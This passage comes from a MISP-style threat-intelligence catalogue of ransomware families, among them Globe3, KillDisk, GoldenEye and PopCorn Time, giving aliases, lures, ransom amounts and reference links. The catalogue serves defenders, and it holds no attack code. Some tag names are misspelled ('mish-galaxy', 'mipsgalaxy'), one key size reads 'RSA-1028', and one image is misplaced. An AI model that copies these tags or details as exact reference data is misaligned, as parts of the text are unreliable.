The tag is: \texttt{misp-galaxy:ransomware=MafiaWare Ransomware}

MafiaWare Ransomware is also known as:

• Depsex Ransomware

\textbf{Table 5075. Table References}

\begin{tabular}{|l|}
\hline
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https://id-ransomware.blogspot.co.il/2017/01/mafiaware.html \\
https://twitter.com/BleepinComputer/status/817069320937345024 \\
\hline
\end{tabular}

Globe3 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 3 bitcoins. Extesion depends on the config file. It seems Globe is a ransomware kit.

The tag is: \texttt{misp-galaxy:ransomware=Globe3 Ransomware}
Globe3 Ransomware is also known as:

- Purge Ransomware

Globe3 Ransomware has relationships with:

- similar: misp-galaxy:ransomware="Globe2 Ransomware" with estimative-language:likelihood-probability="likely"

Table 5076. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/01/globe3-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/globe3-ransomware.html</a></td>
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<td><a href="https://decryptors.blogspot.co.il/2017/01/globe3-decrypter.html">https://decryptors.blogspot.co.il/2017/01/globe3-decrypter.html</a></td>
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<tr>
<td><a href="https://decrypter.emsisoft.com/globe3">https://decrypter.emsisoft.com/globe3</a></td>
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**BleedGreen Ransomware**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 500$ in bitcoins. Requires .NET Framework 4.0. Gets into your startup system and sends you notes like the one below: https://4.bp.blogspot.com/-xrr6aoB_giw/WG1UrGpmZJI/AAAAAAAAC-Q/KtKdQP6iLY4LHaHgudF5dKs6i1JHQOBmgCLcB/s1600/green1.jpg

The tag is: misp-galaxy:ransomware="BleedGreen Ransomware"

BleedGreen Ransomware is also known as:

- FireCrypt Ransomware

Table 5077. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/01/bleedgreen-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/bleedgreen-ransomware.html</a></td>
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</table>

**BTCamant Ransomware**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Original name is Mission 1996 or Mission:
“Impossible” (1996) (like the movie)

The tag is: misp-galaxy:ransomware="BTCamant Ransomware"

Table 5078. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/01/btcamant.html">https://id-ransomware.blogspot.co.il/2017/01/btcamant.html</a></td>
</tr>
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</table>

**X3M Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. It is also possible to break in using RDP Windows with the help of Pass-the-Hash system, PuTTY, mRemoteNG, TightVNC, Chrome Remote Desktop, modified version of TeamViewer, AnyDesk, AmmyyAdmin, LiteManager, Radmin and others. Ransom is 700$ in Bitcoins.

The tag is: misp-galaxy:ransomware="X3M Ransomware"

Table 5079. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/01/x3m-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/x3m-ransomware.html</a></td>
</tr>
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</table>

**GOG Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="GOG Ransomware"

Table 5080. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/01/gog-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/gog-ransomware.html</a></td>
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<td><a href="https://twitter.com/BleepinComputer/status/816112218815266816">https://twitter.com/BleepinComputer/status/816112218815266816</a></td>
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**RegretLocker**

RegretLocker is a new ransomware that has been found in the wild in the last month that does not only encrypt normal files on disk like other ransoms. When running, it will particularly search for VHD files, mount them using Windows Virtual Storage API, and then encrypt all the files it finds inside of those VHD files.

The tag is: misp-galaxy:ransomware="RegretLocker"
**EdgeLocker**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.1 Bitcoins. Original name is TrojanRansom.

The tag is: *misp-galaxy:ransomware*="EdgeLocker"

**Red Alert**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Fake name: Microsoft Corporation. Based on HiddenTear

The tag is: *misp-galaxy:ransomware*="Red Alert"

Red Alert has relationships with:

- similar: *misp-galaxy:malpedia*="Red Alert" with *estimative-language:likelihood_probability*="likely"

**First**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware*="First"
**XCrypt Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Written on Delphi. The user requests the victim to get in touch with him through ICQ to get the ransom and return the files.

The tag is: *misp-galaxy:ransomware="XCrypt Ransomware"*

---

**7Zipper Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware="7Zipper Ransomware"*

---

**Zyka Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 170$ or EUR in Bitcoins.

The tag is: *misp-galaxy:ransomware="Zyka Ransomware"*
SureRansom Ransomeware (Fake)

It's directed to English speaking users, therefore is able to strike worldwide. This ransomware does not really encrypt your files. Ransom requested is £50 using credit card.

The tag is: misp-galaxy:ransomware="SureRansom Ransomeware (Fake)"

Table 5088. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/01/sureransom-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/sureransom-ransomware.html</a></td>
</tr>
</tbody>
</table>

Netflix Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware uses the known online library as a decoy. It poses as Netflix Code generator for Netflix login, but instead encrypts your files. The ransom is 100$ in Bitcoins.

The tag is: misp-galaxy:ransomware="Netflix Ransomware"

Table 5089. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/01/netflix-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/netflix-ransomware.html</a></td>
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Merry Christmas

It’s directed to English and Italian speaking users, therefore is able to infect worldwide. Most attacks are on organizations and servers. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. They pose as a Consumer complaint notification that’s coming from Federal Trade Commission from USA, with an attached file called “complaint.pdf”. Written in Delphi by hacker MicrRP.

The tag is: misp-galaxy:ransomware="Merry Christmas"

Merry Christmas is also known as:

- Merry X-Mas
- MRCR

Table 5090. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/mrcr1-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/mrcr1-ransomware.html</a></td>
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<td><a href="http://www.zdnet.com/article/not-such-a-merry-christmas-the-ransomware-that-also-steals-user-data/">http://www.zdnet.com/article/not-such-a-merry-christmas-the-ransomware-that-also-steals-user-data/</a></td>
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<tr>
<td><a href="https://decrypter.emsisoft.com/mrcr">https://decrypter.emsisoft.com/mrcr</a></td>
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</table>

Seoirse Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Seoirse is how in Ireland people say the name George. Ransom is 0.5 Bitcoins.

The tag is: misp-galaxy:ransomware="Seoirse Ransomware"

Table 5091. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/seoirse-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/seoirse-ransomware.html</a></td>
</tr>
</tbody>
</table>

KillDisk Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office,
Open Office, pictures, videos, shared online files etc.. Every file is encrypted with a personal AES-key, and then AES-key encrypts with a RSA-1028 key. Hacking by TeleBots (Sandworm). Goes under a fake name: Update center or Microsoft Update center.

The tag is: misp-galaxy:ransomware="KillDisk Ransomware"

Table 5092. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/killdisk-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/killdisk-ransomware.html</a></td>
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<td><a href="http://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/">http://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/</a></td>
</tr>
</tbody>
</table>

DeriaLock Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Maker is arizonacode and ransom amount is 20-30$. If the victim decides to pay the ransom, he will have to copy HWID and then speak to the hacker on Skype and forward him the payment.

The tag is: misp-galaxy:ransomware="DeriaLock Ransomware"

Table 5093. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/derialock-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/derialock-ransomware.html</a></td>
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</table>

BadEncript Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="BadEncript Ransomware"
AdamLocker Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The name of the creator is puff69.

The tag is: `misp-galaxy:ransomware="AdamLocker Ransomware"`

Alphabet Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware poses as Windows 10 Critical Update Service. Offers you to update your Windows 10, but instead encrypts your files. For successful attack, the victim must have .NET Framework 4.5.2 installed on him computer.

The tag is: `misp-galaxy:ransomware="Alphabet Ransomware"`

Alphabet Ransomware has relationships with:

- similar: `misp-galaxy:malpedia="Alphabet Ransomware"` with estimative-language:likelihood-probability="likely"

KoKoKrypt Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread by its creator in forums. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files and documents and more. The ransom is 0.1 bitcoins within 72 hours. Uses Windows Update as a decoy. Creator: Talnaci Alexandru

The tag is: `misp-galaxy:ransomware="KoKoKrypt Ransomware"`
KoKoKrypt Ransomware is also known as:

- KokoLocker Ransomware

Table 5097. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/12/kokokrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/kokokrypt-ransomware.html</a></td>
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<td><a href="http://removevirusadware.com/tips-for-removeing-kokokrypt-ransomware/">http://removevirusadware.com/tips-for-removeing-kokokrypt-ransomware/</a></td>
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**L33TAF Locker Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.5 bitcoins. The name of the creator is staffttt, he also created Fake CryptoLocker

The tag is: *misp-galaxy:ransomware=L33TAF Locker Ransomware*

Table 5098. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/l33taf-locker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/l33taf-locker-ransomware.html</a></td>
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**PClock4 Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam (for example: “you have a criminal case against you”), fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware=PClock4 Ransomware*

PClock4 Ransomware is also known as:

- PClock SysGop Ransomware

Table 5099. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/pclock4-sysgop-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/pclock4-sysgop-ransomware.html</a></td>
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</table>

**Guster Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware uses VBS-script to send a voice message as the first few lines of the note.
The tag is: `misp-galaxy:ransomware="Guster Ransomware"`

### Roga

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker requests the ransom in Play Store cards.

![Guster Ransomware](https://3.bp.blogspot.com/-ClUef8T55f4/WGKb8U4GeaI/AAAAAAAACzg/UFD0X2sORHYTVRNBSoqd5q7TBrOblQHmgCLcB/s1600/site.png)

The tag is: `misp-galaxy:ransomware="Roga"`

Roga has relationships with:

- similar: `misp-galaxy:ransomware="Free-Freedom"` with `estimative-language:likelihood-probability="likely"`

### CryptoLocker3 Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Creator is staffttt and the ransom is 0.5 botcoins.

The tag is: `misp-galaxy:ransomware="CryptoLocker3 Ransomware"`

CryptoLocker3 Ransomware is also known as:

- Fake CryptoLocker

### Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/guster-ransomware.html">id-ransomware.blogspot.co.il/2016/12/guster-ransomware.html</a></td>
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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/cryptolocker3-ransomware.html">id-ransomware.blogspot.co.il/2016/12/cryptolocker3-ransomware.html</a></td>
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</tbody>
</table>
ProposalCrypt Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 1.0 bitcoins.

The tag is: misp-galaxy:ransomware="ProposalCrypt Ransomware"

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Manifestus Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker demands 0.2 bitcoins. The ransomware poses as a Window update.

The tag is: misp-galaxy:ransomware="Manifestus Ransomware"

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/manifestus-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/manifestus-ransomware.html</a></td>
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</table>

EnkripsiPC Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The name of the hacker is humanpuff69 and he requests 0.5 bitcoins. The encryption password is based on the computer name

The tag is: misp-galaxy:ransomware="EnkripsiPC Ransomware"

EnkripsiPC Ransomware is also known as:

- IDRANSOMv3
- Manifestus
EnkripsiPC Ransomware has relationships with:

- similar: misp-galaxy:malpedia="Manifestus" with estimative-language:likelihood-probability="likely"

### Table 5105. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/enkripsipc-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/enkripsipc-ransomware.html</a></td>
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### BrainCrypt Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. So far the victims are from Belarus and Germany.

The tag is: misp-galaxy:ransomware="BrainCrypt Ransomware"

### MSN CryptoLocker Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.2 bitcoins.

The tag is: misp-galaxy:ransomware="MSN CryptoLocker Ransomware"

### CryptoBlock Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is in the amount is 0.3 bitcoins. The ransomware is disguises themselves as Adobe Systems, Incorporated. RaaS
The tag is: misp-galaxy:ransomware="CryptoBlock Ransomware"

Table 5108. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/cryptoblock-ransomware.html
https://twitter.com/drProct0r/status/810500976415281154

AES-NI Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="AES-NI Ransomware"

Table 5109. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/aes-ni-ransomware.html

Koolova Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker of this ransomware tends to make lots of spelling errors in his requests. With Italian text that only targets the Test folder on the user's desktop

The tag is: misp-galaxy:ransomware="Koolova Ransomware"

Table 5110. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/koolova-ransomware.html

Fake Globe Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... The ransom is 1bitcoin.

The tag is: misp-galaxy:ransomware="Fake Globe Ransomware"

Fake Globe Ransomware is also known as:
Fake Globe Ransomware has relationships with:

- similar: misp-galaxy:malpedia="GlobeImposter" with estimative-language:likelihood-probability="likely"

### Table 5111. Table References

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### V8Locker Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc...

The tag is: misp-galaxy:ransomware="V8Locker Ransomware"

### Cryptorium (Fake Ransomware)

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc., however your files are not really encrypted, only the names are changed.

The tag is: misp-galaxy:ransomware="Cryptorium (Fake Ransomware)"
Antihacker2017 Ransomware

It's directed to Russian speaking users, therefore is able to infect mosty the old USSR countries. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... The hacker goes by the nickname Antihacker and requests the victim to send him an email for the decryption. He does not request any money only a warning about looking at porn (gay, incest and rape porn to be specific).

The tag is: mish-galaxy:ransomware="Antihacker2017 Ransomware"

Table 5114. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/antihacker2017-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/antihacker2017-ransomware.html</a></td>
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</table>

CIA Special Agent 767 Ransomware (FAKE!!!)

It's directed to English speaking users, therefore is able to infect users all over the world. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... Your files are not really encrypted and nothing actually happens, however the hacker does ask the victim to pay a sum of 100$, after 5 days the sum goes up to 250$ and thereafter to 500$. After the payment is received, the victim gets the following message informing him that he has been fooled and he simply needed to delete the note. https://4.bp.blogspot.com/-T8iSbbGOz84/WFGZEbuRfCI/AAAAAAAACm0/SO8Srwx2UIM3FPZcZl7W76oSDCsnq2vfgCPcB/s1600/code2.jpg

The tag is: mish-galaxy:ransomware="CIA Special Agent 767 Ransomware (FAKE!!!)"

Table 5115. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/cia-special-agent-767-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/cia-special-agent-767-ransomware.html</a></td>
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LoveServer Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... This hacker request your IP address in return for the decryption.
Kraken Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... The hacker requests 2 bitcoins in return for the files.

The tag is: *misp-galaxy:ransomware*="Kraken Ransomware"

Antix Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... The ransom is 0.25 bitcoins and the nickname of the hacker is FRC 2016.

The tag is: *misp-galaxy:ransomware*="Antix Ransomware"

PayDay Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... The ransom is R$950 which is due in 5 days. (R$ is a Brazilian currency) Based off of Hidden-Tear

The tag is: *misp-galaxy:ransomware*="PayDay Ransomware "

Table 5116. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/12/loveserver-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/loveserver-ransomware.html</a></td>
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</thead>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/12/antix-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/antix-ransomware.html</a></td>
</tr>
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</table>

Table 5119. Table References

<table>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/12/payday-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/payday-ransomware.html</a></td>
</tr>
</tbody>
</table>
Slimhem Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is NOT spread using email spam, fake updates, attachments and so on. It simply places a decrypt file on your computer.

The tag is: \textit{misp-galaxy:ransomware="Slimhem Ransomware"}

\textit{Table 5120. Table References}

<table>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/12/slimhem-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/slimhem-ransomware.html</a></td>
</tr>
</tbody>
</table>

M4N1F3STO Ransomware (FAKE!!!!!)

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... FILES DON'T REALLY GET DELETED NOR DO THEY GET ENCRYPTED!!!!!!

The tag is: \textit{misp-galaxy:ransomware="M4N1F3STO Ransomware (FAKE!!!!!)"}

\textit{Table 5121. Table References}

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/12/m4n1f3sto-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/m4n1f3sto-ransomware.html</a></td>
</tr>
</tbody>
</table>

Dale Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... CHIP > DALE

The tag is: \textit{misp-galaxy:ransomware="Dale Ransomware"}

Dale Ransomware is also known as:

• DaleLocker Ransomware

UltraLocker Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... Based on the idiotic open-source ransomware called CryptoWire

The tag is: \textit{misp-galaxy:ransomware="UltraLocker Ransomware"}
AES_KEY_GEN_ASSIST Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc...

The tag is: `misp-galaxy:ransomware="AES_KEY_GEN_ASSIST Ransomware"`

Code Virus Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Code Virus Ransomware"`

FLKR Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="FLKR Ransomware"`
**PopCorn Time Ransomware**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. These hackers claim to be students from Syria. This ransomware poses as the popular torrent movie screener called PopCorn. These criminals give you the chance to retrieve your files “for free” by spreading this virus to others. Like shown in the note bellow:  


The tag is: `misp-galaxy:ransomware="PopCorn Time Ransomware"`

**Table 5126. Table References**

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/12/popcorntime-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/popcorntime-ransomware.html</a></td>
</tr>
</tbody>
</table>

**HackedLocker Ransomware**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... NO POINT OF PAYING THE RANSOM—THE HACKER DOES NOT GIVE A DECRYPT AFTERWARDS.

The tag is: `misp-galaxy:ransomware="HackedLocker Ransomware"`

**Table 5127. Table References**

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/12/hackedlocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/hackedlocker-ransomware.html</a></td>
</tr>
</tbody>
</table>

**GoldenEye Ransomware**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc...

The tag is: `misp-galaxy:ransomware="GoldenEye Ransomware"`

GoldenEye Ransomware has relationships with:

- similar: `misp-galaxy:ransomware="Petya"` with estimative-language:likelihood-probability="likely"
Sage Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc...

The tag is: `misp-galaxy:ransomware="Sage Ransomware"`

SQ_ Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc... This hacker requests 4 bitcoins for ransom.

The tag is: `misp-galaxy:ransomware="SQ Ransomware"`

SQ_ Ransomware is also known as:

- VO_ Ransomware

Matrix

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc...

The tag is: `misp-galaxy:ransomware="Matrix"`

Matrix is also known as:
• Malta Ransomware
• Matrix Ransomware

Table 5131. Table References

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</tbody>
</table>

Satan666 Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Satan666 Ransomware"`

Table 5132. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/satan666-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/satan666-ransomware.html</a></td>
</tr>
</tbody>
</table>

RIP (Phoenix) Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Based on HiddenTear
The tag is: mipsgalaxy:ransomware="RIP (Phoenix) Ransomware"

RIP (Phoenix) Ransomware is also known as:

- RIP
- Phoenix

Table 5133. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/rip-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/rip-ransomware.html</a></td>
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<td><a href="https://twitter.com/BleepinComputer/status/804810315456200704">https://twitter.com/BleepinComputer/status/804810315456200704</a></td>
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</table>

Locked-In Ransomware or NoValid Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on RemindMe

The tag is: mipsgalaxy:ransomware="Locked-In Ransomware or NoValid Ransomware"

Locked-In Ransomware or NoValid Ransomware is also known as:

- Locked-In Ransomware
- NoValid Ransomware

Table 5134. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2016/11/novalid-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/novalid-ransomware.html</a></td>
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<tr>
<td><a href="https://twitter.com/struppigel/status/807169774098796544">https://twitter.com/struppigel/status/807169774098796544</a></td>
</tr>
</tbody>
</table>

Chartwig Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: mipsgalaxy:ransomware="Chartwig Ransomware"

Table 5135. Table References

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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/11/chartwig-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/chartwig-ransomware.html</a></td>
</tr>
</tbody>
</table>
RenLocker Ransomware (FAKE)

